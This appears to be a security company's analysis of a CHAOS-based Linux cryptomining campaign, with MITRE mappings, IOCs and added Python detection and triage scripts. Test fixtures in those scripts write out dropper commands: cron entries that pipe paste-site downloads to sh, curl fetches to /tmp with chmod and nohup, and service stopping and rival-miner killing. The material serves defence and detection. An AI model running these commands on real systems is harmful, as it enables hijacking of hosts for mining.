Impact of Crypto Mining Infections
Sapphire’s SOC Team has been tracking a recent Crypto Mining campaign targeting Linux systems that makes use of a proof-of-concept (PoC) remote access tool hosted on GitHub known as ‘CHAOS’.
As many as one in six exploitations of well-known vulnerabilities results in the deployment of Crypto Mining software, and three times as many new Crypto Mining tools were discovered in Q3 2022 as in Q3 2021.
In recent months, there has been a trend of vulnerable cloud-based infrastructure being targeted to deploy crypto-mining malware. A cryptominer will drive the CPU of a compromised asset to 100%, with a corresponding increase in energy consumption. A system running at around 15% CPU utilisation for one month may incur an electricity charge of around £17; with a cryptominer pinning the CPU at 100%, that monthly cost rises to approximately £107.
Cryptocurrencies are digital monetary assets that can be exchanged over a peer-to-peer network, which in theory removes the reliance on a middleman or a centralised authority. New coins come into existence via one of two popular methods. The first is ‘Proof-of-Work’ (PoW): mining software repeatedly hashes candidate blocks until it finds one whose hash meets the network’s difficulty target. The work is deliberately expensive, and the target gets harder as more hashing power joins the network, which is why a miner will consume every CPU cycle it is given.
Many earlier cryptocurrencies, such as Bitcoin and Monero, operate using PoW. Monero’s PoW algorithm is designed to run efficiently on general-purpose CPUs, which is why cryptomining malware on servers almost always mines Monero, typically with XMRig. The second and newer method is ‘Proof-of-Stake’ (PoS), which was designed to be far less computationally demanding: participants must first own and lock up coins or tokens (their stake) to become a validator, and validators are selected by stake rather than by hashing power.
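To make the PoW point concrete, here is a toy proof-of-work loop. It is an added illustration, not code from the Sapphire write-up or from any miner: the “difficulty” is the number of leading zero bits a SHA-256 hash of (header || nonce) must have, and the header bytes are a constructed stand-in for a real block header. Each extra bit of difficulty doubles the expected number of hashes, while checking a solution always costs one hash.

```python
"""Toy proof-of-work (added example, not from the original article).

Difficulty is expressed as leading zero bits of sha256(header || nonce).
Expected hashes to find a solution ~ 2**difficulty_bits, which is why a miner
saturates every core it can get; verification is a single hash.
"""
import hashlib
import struct


def leading_zero_bits(digest: bytes) -> int:
    """Number of leading zero bits in a digest (the usual PoW difficulty measure)."""
    n = 0
    for byte in digest:
        if byte == 0:
            n += 8
            continue
        n += 8 - byte.bit_length()
        break
    return n


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Try nonces in order until sha256(header || nonce) has at least
    difficulty_bits leading zero bits. Returns (nonce, hashes_tried)."""
    for nonce in range(max_nonce):
        digest = hashlib.sha256(header + struct.pack("<Q", nonce)).digest()
        if leading_zero_bits(digest) >= difficulty_bits:
            return nonce, nonce + 1
    raise RuntimeError("nonce space exhausted without meeting the target")


def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Checking a solution costs one hash, however many the miner burned finding it."""
    digest = hashlib.sha256(header + struct.pack("<Q", nonce)).digest()
    return leading_zero_bits(digest) >= difficulty_bits


if __name__ == "__main__":
    header = b"constructed block header"  # stand-in for a real block header
    for bits in (8, 12, 16, 20):
        nonce, tried = mine(header, bits)
        print(f"difficulty={bits:2d} bits  nonce={nonce:8d}  hashes={tried:8d}  "
              f"expected~{2 ** bits:8d}  verified={verify(header, nonce, bits)}")
```

Run it and watch the hash count roughly quadruple every time the difficulty rises by two bits; real networks retune the target continuously so that the global hash rate, not any single machine, decides how often a block is found.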
Sapphire’s SOC Team has performed technical analysis on five malicious files associated with a recent CHAOS-based Crypto Mining infection. Below, we briefly cover each file, explaining its purpose and operation.
The Genshin file (apparently named after the role-playing game of the same name) is primarily responsible for downloading the CHAOS remote access tool onto a compromised system.
Genshin is an Executable and Linkable Format (ELF) binary written and compiled in Go. Running it through UPX (Ultimate Packer for eXecutables) confirmed that it was not UPX-packed, perhaps indicating a less sophisticated toolset: malware is often packed to evade defences and to hinder reverse engineering.
Several interesting strings were extracted from the binary during analysis, including four unique references to GitHub repositories. Three of them, CHAOS, screenshot and XGB, are discussed below.
The first, CHAOS, is used for payload generation and for remotely controlling a system, essentially offering Command and Control (C2) functionality. CHAOS can log keyboard input (T1056.001), create reverse shells (T1059.004), upload files to and download files from the victim (T1105, T1041), obtain system information (T1082) and shut the system down (T1529). CHAOS is cross-platform, with versions available for both Linux and Windows.
The second, ‘screenshot’, is a cross-platform Go library for capturing desktop screen images. Capturing screen content is a common post-compromise technique for gathering additional information and maps to MITRE ATT&CK T1113 (Screen Capture).
The third, ‘XGB’, is a low-level API used to communicate with the X server, the program that draws the graphical user interface. Its GitHub page describes it as follows: “The X Go Binding is a low-level API to communicate with the X server. It is modelled on XCB and supports many X extensions.” ‘X’, otherwise known as the X Window System, is a common component of Unix systems and provides the framework needed to display a graphical user interface.
Next, a sample of network traffic produced by Genshin, shown below, reveals a connection to an external address on TCP port 8080 (the default port used by the CHAOS tool). Open-source intelligence sources show that the same address has also been reported as hosting Cobalt Strike (S0154) and Meterpreter payloads.
The Genshin file was then checked for known malware behaviours mapped to MITRE’s ATT&CK framework. Three were identified: T1140 (Deobfuscate/Decode Files or Information), T1027 (Obfuscated Files or Information) and T1082 (System Information Discovery), as shown below.
Further analysis using Mandiant’s open-source capability-detection tool ‘capa’ identified XOR and Base64 encoding routines in the binary, along with AES and RC4 (PRGA) routines used for data encryption. capa also flagged that the binary reads the /sys virtual filesystem to enumerate system information such as CPU attributes and system power state.
The second file, ‘am32’, appears to be geared towards establishing persistence on the compromised system.
A scheduled task is created via /etc/crontab, and a script called /etc/init.d/linux_kill is installed as a system service. The binary then reads CPU attributes, modifies RC scripts (T1037.004) and registers its own service under init.d (T1543, Create or Modify System Process). Administrators legitimately use RC scripts to specify which services run at which run-level on start-up.
However, threat actors abuse the same mechanism to establish persistence by appending malicious commands to existing RC scripts or dropping their own. Administrators can help mitigate this by restricting write access to /etc/init.d, /etc/rc.local and the rc*.d directories so that only authorised users can change them, and by alerting on any change to those paths through file integrity monitoring.
Using Ghidra, we observe signs of attempted obfuscation where a string within a function has been encoded using Base64, as shown below. Once decoded, the string is a domain, Gn[.]lm7t[.]top, which is used to host malicious resources.
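The Base64-encoded domain above is the kind of thing worth hunting for across a whole binary rather than one function at a time. The script below is an added example, not part of Sapphire’s analysis: it pulls printable strings out of a byte blob the way strings(1) does, tries to Base64-decode the ones that look like Base64, and keeps only those that decode to a hostname, URL or IP address, printing them defanged. The SAMPLE bytes are a constructed stand-in for a .rodata section, and the embedded c2.example.invalid URL is made up so the script runs offline.

```python
"""Find Base64-encoded network indicators in a binary (added example)."""
import base64
import binascii
import re
import string

PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
HOST_RE = re.compile(r"^(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?::\d+)?(?:/\S*)?$", re.I)
IPV4_RE = re.compile(r"^(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/\S*)?$")


def ascii_strings(blob: bytes, min_len: int = 6):
    """Yield runs of printable ASCII of at least min_len bytes, like strings(1)."""
    run = bytearray()
    for b in blob:
        if chr(b) in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            yield run.decode("ascii")
        run = bytearray()
    if len(run) >= min_len:
        yield run.decode("ascii")


def try_b64(s: str):
    """Decode s as Base64 (tolerating stripped padding); return text or None."""
    if not B64_RE.match(s):
        return None
    padded = s + "=" * (-len(s) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):   # UnicodeDecodeError is a ValueError
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def defang(s: str) -> str:
    """Make an indicator safe to paste into a ticket."""
    return s.replace(".", "[.]").replace("http", "hxxp")


def find_encoded_indicators(blob: bytes):
    """Return [(encoded, defanged decoded)] for Base64 strings hiding a host/IP."""
    hits = []
    for s in ascii_strings(blob):
        dec = try_b64(s)
        if dec and (HOST_RE.match(dec) or IPV4_RE.match(dec)):
            hits.append((s, defang(dec)))
    return hits


# Constructed stand-in for a .rodata section: ordinary Go strings, one encoded C2
# URL (made-up host) and one Base64 string that decodes to harmless text.
SAMPLE = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
          + b"runtime.main\x00" + b"/proc/cpuinfo\x00"
          + base64.b64encode(b"http://c2.example.invalid:8080/password.txt") + b"\x00"
          + b"Go build ID: abcdef\x00"
          + base64.b64encode(b"not an indicator, just text") + b"\x00")

if __name__ == "__main__":
    for enc, dec in find_encoded_indicators(SAMPLE):
        print(f"{enc}  ->  {dec}")
```

Note the two filters: the Base64 alphabet is permissive enough that ordinary paths such as /proc/cpuinfo match the regex, so a candidate only survives if it both decodes cleanly and looks like a network indicator.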
As shown below, analysis of the network traffic generated by am32 shows further communication with another unique, Hong Kong-based IP address and domain. This IP address was used to host additional resources, namely an encrypted password.txt file, which is a known IOC. Over the preceding two months the same IP had also served unrelated Windows, Android and Linux malware.
Also hosted on 154[.]82[.]92[.]2 was an encrypted file named ‘cve.txt’. Again using Ghidra, we see numerous functions containing references to ‘CVE’ in conjunction with CHAOS, as shown below.
These findings align with reports that state CHAOS can provide its operators with a manual method to scan the compromised system for vulnerabilities and perform automated vulnerability exploitation.
The third file, ‘solr.sh’, is a shell script that searches for and disables any competing Crypto Mining software already present on the compromised system before establishing persistence and launching the actor’s own files.
Solr.sh consists of three main components. First, it stops and disables services named sysguard and sysupdate. Whether these are the legitimate daemons their names suggest (a load guard that protects a server from falling over under high load, and an automatic update service) or components of a rival mining campaign, stopping them removes any artificial CPU and RAM limits and frees up computing power for the attacker’s own miner. Solr.sh also searches for competing Crypto Mining software already running on the system and terminates it: we see pkill being issued for other popular mining families, including kinsing and watchbog.
Next, to establish persistence, several scheduled tasks are written into the crontab using the stream editor sed, including what appear to be HTTP GET requests issued to a Latvian IP address associated with Crypto Mining activity, as shown below.
Lastly, nohup is used to launch the threat actor’s dropped files from the /tmp directory, including the Genshin file described earlier, as shown below. nohup detaches the process from the terminal and makes it ignore SIGHUP, so the miner keeps running after the attacker’s session ends.
The fourth file we analysed was ‘Rn02s62s.sh.’ Its primary function is to achieve persistence on the compromised system by modifying the crontab (T1053.003).
The script installs a cron entry that, every ten minutes, pulls attacker-controlled instructions from an anonymous Pastebin posting, so the operator can change what runs on the host without touching it again, as shown below.
Next, we see this script downloading additional malicious content from an attacker-controlled IP, after which permissions are assigned to the downloaded content to ensure they are executable, as shown below.
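The behaviours described for am32, solr.sh and Rn02s62s.sh (cron and init.d persistence, stopping services, killing rival miners, fetching instructions from a paste site, chmod +x on downloads, nohup from /tmp) are all visible in the dropper scripts themselves, so they make a good static triage checklist. The script below is an added example, not Sapphire’s tooling: each rule is a regular expression over one line of the script and carries the ATT&CK mapping used in the text. The SAMPLE script is constructed to mimic the behaviours described; 198.51.100.7 and paste.example.invalid are reserved documentation values, not real indicators.

```python
"""Static triage of a Linux cryptominer dropper script (added example)."""
import re

# Rival miners the text says solr.sh kills; extend from your own intel.
RIVAL_MINERS = ("kinsing", "watchbog", "sysguard", "sysupdate", "xmrig", "minerd")

# (rule id, ATT&CK mapping, regex applied to each line of the script)
RULES = [
    ("disable-service", "T1489 Service Stop",
     re.compile(r"\b(systemctl\s+(stop|disable)|service\s+\S+\s+stop|chkconfig\s+\S+\s+off)\b")),
    ("kill-rival-miner", "T1489 Service Stop (competitor removal)",
     re.compile(r"\b(pkill|killall|kill)\b.*\b(" + "|".join(RIVAL_MINERS) + r")\b")),
    ("cron-modify", "T1053.003 Scheduled Task/Job: Cron",
     re.compile(r"(crontab\s+-|/etc/cron|/var/spool/cron)")),
    ("rc-modify", "T1037.004 Boot or Logon Initialization Scripts: RC Scripts",
     re.compile(r"(/etc/init\.d/|/etc/rc\.local|update-rc\.d|chkconfig\s+--add)")),
    ("ingress-tool", "T1105 Ingress Tool Transfer",
     re.compile(r"\b(curl|wget)\b.*\bhttps?://")),
    ("remote-instructions", "T1102 Web Service (commands pulled from a paste site)",
     re.compile(r"\b(curl|wget)\b.*\b(pastebin|paste)\.")),
    ("chmod-exec", "T1222.002 Linux and Mac File and Directory Permissions Modification",
     re.compile(r"\bchmod\s+([ugoa]*\+[rw]*x|[0-7]*7[0-7]*)\b")),
    # Only fires when the /tmp path is the command itself (start of line or after ; & |),
    # not when it is merely a download target or chmod argument.
    ("exec-from-tmp", "execution from a world-writable directory (heuristic, no single ATT&CK ID)",
     re.compile(r"(^|[;&|]\s*)(nohup\s+)?(/tmp|/var/tmp|/dev/shm)/\S+")),
]


def triage(script: str) -> dict:
    """Map rule id -> list of 1-based line numbers that triggered it."""
    hits = {}
    for lineno, line in enumerate(script.splitlines(), start=1):
        for rule_id, _, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(rule_id, []).append(lineno)
    return hits


def verdict(hits: dict) -> str:
    """Crude scoring: three or more distinct behaviours is enough to call it."""
    n = len(hits)
    return "malicious" if n >= 3 else "suspicious" if n else "clean"


def techniques(hits: dict) -> list:
    """ATT&CK labels for the rules that fired, for the ticket or the SIEM tag."""
    label = {rule_id: mapping for rule_id, mapping, _ in RULES}
    return sorted(label[r] for r in hits)


# Constructed dropper modelled on the behaviours described in the text.
SAMPLE = """\
#!/bin/sh
systemctl stop sysguard 2>/dev/null
systemctl disable sysupdate 2>/dev/null
pkill -f kinsing; pkill -f watchbog
cp /tmp/linux_kill /etc/init.d/linux_kill && chkconfig --add linux_kill
sed -i '/genshin/d' /etc/crontab
echo "*/10 * * * * root wget -qO- https://paste.example.invalid/raw/abc123 | sh" >> /etc/crontab
curl -o /tmp/genshin http://198.51.100.7/genshin
chmod +x /tmp/genshin
nohup /tmp/genshin >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    hits = triage(SAMPLE)
    for rule_id, lines in hits.items():
        print(f"{rule_id:20s} lines {lines}")
    print(verdict(hits), techniques(hits))
```

The rules are deliberately line-oriented so they also work on shell history, cron entries and EDR command-line telemetry, not just on a recovered script.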
The last file involved was a configuration file used to specify mining pool parameters.
Lastly, we see a JSON file being downloaded via curl. This is the configuration XMRig needs in order to mine Monero. It lists multiple IP addresses belonging to mining pools, each with its own CPU performance settings, as shown below. In this instance, we observed a China-based mining pool called C3Pool being used.
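A recovered XMRig config is one of the richest IOC sources in an incident like this, because it has to name the pools and the wallet. The parser below is an added example, not part of the original analysis: it normalises the pool URLs XMRig accepts (with or without a stratum scheme), checks whether the user field has the shape of a Monero address, and records the CPU budget the operator asked for. The SAMPLE_CONFIG, the pool hosts (reserved documentation values) and the dummy wallet are all constructed; the known-pool set is a placeholder for your own threat intelligence.

```python
"""Extract IOCs from an XMRig-style config.json (added example)."""
import json
import re
from urllib.parse import urlparse

# Standard Monero address: 95 base58 characters starting with 4 (8 for subaddresses).
MONERO_ADDR_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# Pool hosts already known from intel; constructed placeholder for the demo.
KNOWN_POOL_HOSTS = {"pool.example.invalid"}


def parse_pool_url(url: str) -> dict:
    """XMRig accepts 'host:port' or 'stratum+tcp://host:port'; normalise both."""
    if "://" not in url:
        url = "stratum+tcp://" + url
    p = urlparse(url)
    return {"scheme": p.scheme, "host": p.hostname, "port": p.port}


def looks_like_monero_address(value: str) -> bool:
    return bool(MONERO_ADDR_RE.match(value or ""))


def analyse_xmrig_config(text: str) -> dict:
    """Pull pools, wallet(s) and CPU budget out of an XMRig config."""
    cfg = json.loads(text)
    cpu = cfg.get("cpu") if isinstance(cfg.get("cpu"), dict) else {}
    threads_hint = int(cpu.get("max-threads-hint", 100))  # XMRig default: all cores
    pools, wallets = [], set()
    for pool in cfg.get("pools", []):
        entry = parse_pool_url(pool.get("url", ""))
        entry["tls"] = bool(pool.get("tls", False))
        entry["known_pool"] = entry["host"] in KNOWN_POOL_HOSTS
        pools.append(entry)
        wallet = str(pool.get("user", "")).split("+")[0]  # XMRig allows "address+difficulty"
        if looks_like_monero_address(wallet):
            wallets.add(wallet)
    return {
        "pools": pools,
        "wallets": sorted(wallets),
        "cpu_threads_hint_pct": threads_hint,
        "full_cpu": threads_hint >= 100,
    }


def ioc_lines(report: dict) -> list:
    """host:port strings in the form you would drop straight into a blocklist."""
    return [f"{p['host']}:{p['port']}" for p in report["pools"] if p["host"]]


DUMMY_WALLET = "4" + "A" * 94  # right shape, not a real address

# Constructed config mirroring the fields XMRig uses; hosts are reserved documentation values.
SAMPLE_CONFIG = json.dumps({
    "autosave": True,
    "cpu": {"enabled": True, "max-threads-hint": 100, "priority": 5},
    "donate-level": 1,
    "pools": [
        {"url": "pool.example.invalid:3333", "user": DUMMY_WALLET + "+50000", "pass": "x", "tls": False},
        {"url": "stratum+ssl://203.0.113.10:443", "user": DUMMY_WALLET, "pass": "x", "tls": True},
    ],
})

if __name__ == "__main__":
    report = analyse_xmrig_config(SAMPLE_CONFIG)
    print(json.dumps(report, indent=2))
    print("blocklist:", ioc_lines(report))
```

The wallet address is the most durable pivot: pools and IPs rotate between campaigns, but the operator has to keep the same address to get paid, so it is worth searching other recovered configs and pool APIs for it.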
Using MITRE’s D3FEND framework, we have mapped several of the MITRE ATT&CK TTPs observed to give specific countermeasures.
- D3-SJA (Scheduled Job Analysis)
- D3-PSA (Process Spawn Analysis)
- D3-CI (Configuration Inventory)
- D3-EAL (Executable Allowlisting)
- D3-SCA (System Call Analysis)
Systems should be patched routinely and frequently to ensure an attacker cannot exploit known vulnerabilities. Systems should also be hardened by removing unnecessary services and software. Sapphire’s Managed Vulnerability Management services can assist with this.
Endpoint Detection & Response (EDR) products should be deployed on as many assets as possible to prevent known and unknown threats, such as cryptominers, from compromising assets. Sapphire’s Managed EDR can assist with enforcing D3-EAL and monitoring for D3-SCA.
Effective usage of perimeter firewalls and next-generation firewalls can mitigate specific attacks before they enter the network.
Managed SIEM and EDR alerting for anomalous ingress tool activity (T1105), such as curl and wget, can aid in detecting suspicious tools or other files being transferred from an external system into a compromised environment. Sapphire’s Managed SIEM can also support D3-SJA and D3-PSA detections.
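The ingress-tool (T1105), scheduled-job (D3-SJA) and process-spawn (D3-PSA) detections above can be expressed in a few lines over process-start telemetry. The script below is an added example, not a Sapphire detection: it reads JSON-lines process events of the shape most EDR or auditd pipelines can emit (pid, ppid, exe, cmdline), reconstructs each process’s ancestry from the ppid links, and raises an alert when a downloader fetches from a bare IP or a paste site, when a downloader runs under cron, or when anything executes from a world-writable directory. The SAMPLE_EVENTS are constructed to mirror the chain described for this campaign; 198.51.100.7 is a reserved documentation address.

```python
"""Process-spawn and ingress-tool detection over JSON-lines process events (added example)."""
import json
import re

DOWNLOADERS = {"curl", "wget"}
SCHEDULERS = {"cron", "crond", "anacron", "atd"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
URL_HOST_RE = re.compile(r"""https?://([^/\s:'"]+)""")
BARE_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
PASTE_RE = re.compile(r"paste", re.I)


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def ancestry(by_pid: dict, pid: int, limit: int = 16) -> list:
    """Executable names from this process up to the root, following ppid links."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["exe"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(jsonl: str) -> list:
    """Return alerts as dicts with pid, rule, detail and the process ancestry."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["exe"])
        chain = ancestry(by_pid, e["pid"])

        def alert(rule, detail, e=e, chain=chain):
            alerts.append({"pid": e["pid"], "rule": rule, "detail": detail, "chain": chain})

        if name in DOWNLOADERS:
            for host in URL_HOST_RE.findall(e["cmdline"]):
                host = host.split("@")[-1]  # drop any user:pass@ prefix
                if BARE_IP_RE.match(host) or PASTE_RE.search(host):
                    alert("T1105 ingress tool transfer from bare IP or paste site", host)
            if any(a in SCHEDULERS for a in chain[1:]):
                alert("D3-SJA/D3-PSA downloader spawned under a scheduler", " <- ".join(chain))
        if e["exe"].startswith(WRITABLE_DIRS):
            alert("D3-PSA execution from world-writable directory", e["exe"])
    return alerts


# Constructed events: a cron job pulling a script from a bare IP, a binary
# launched from /tmp, and a benign interactive curl that must not alert.
SAMPLE_EVENTS = """\
{"pid": 1, "ppid": 0, "exe": "/sbin/init", "cmdline": "/sbin/init"}
{"pid": 420, "ppid": 1, "exe": "/usr/sbin/cron", "cmdline": "/usr/sbin/cron -f"}
{"pid": 4310, "ppid": 420, "exe": "/bin/sh", "cmdline": "/bin/sh -c curl -fsSL http://198.51.100.7/rn02s62s.sh | sh"}
{"pid": 4311, "ppid": 4310, "exe": "/usr/bin/curl", "cmdline": "curl -fsSL http://198.51.100.7/rn02s62s.sh"}
{"pid": 4320, "ppid": 4310, "exe": "/tmp/genshin", "cmdline": "/tmp/genshin"}
{"pid": 3000, "ppid": 1, "exe": "/bin/bash", "cmdline": "-bash"}
{"pid": 3001, "ppid": 3000, "exe": "/usr/bin/curl", "cmdline": "curl -O https://deb.debian.org/debian/README"}
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"pid {a['pid']:5d}  {a['rule']}  [{a['detail']}]  chain={' <- '.join(a['chain'])}")
```

The ancestry check is what keeps the false-positive rate down: an administrator running curl from an interactive shell looks identical to the malicious fetch on the command line alone, but not once you see that one was spawned by cron and the other by a login shell.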
Further recommendations for defending against Crypto Mining can be found at Sapphire’s partner Checkpoint via https://blog.checkpoint.com/2018/03/21/preventing-crypto-mining-attacks-four-key-steps-thatll-keep-safe/.
Indicators of Compromise (IOCs)
- 94803cf635cf08b96ea3de6b301563b5 (Genshin MD5)
- c05c91ec2b1a4504293ac9700123c91dc9e16f35 (Genshin SHA1)
- 759c496b114f9212c610892c5236935cced564a78b3b410bd2d27c9ee6257f42 (Genshin SHA256)
- d59e2231daa98370d4f6f7d675a4877a (am32 MD5)
- 51b36e12882be45cc1305dfb8acf0f5f9afc9dac (am32 SHA1)
- 01d5858fb9644293087eb48b4faf3a9aa9b1bce411bde26e04a70ebfcde4f072 (am32 SHA256)
- a53a9ca8a074c7108f8412c3f8c1fc5d (solr.sh MD5)
- a98dcdee82f6066a4cf2f9d7d161a1bacec8f81d (solr.sh SHA1)
- 7a96d9f7a25a67ec2873bb814cb0ba104d3b7c1651f65ff09d8e1f76cba6fb79 (solr.sh SHA256)
- 24d5079edbcb36be6b56ec4b67474cfd (rn02s62s MD5)
- a2193067bc0b1a2993ac927f7855877e1bad4b99 (rn02s62s SHA1)
- 52ab96b1d99964502a7946eef39a5f636d8a240c747d43f8568d62cf0e960ae9 (rn02s62s SHA256)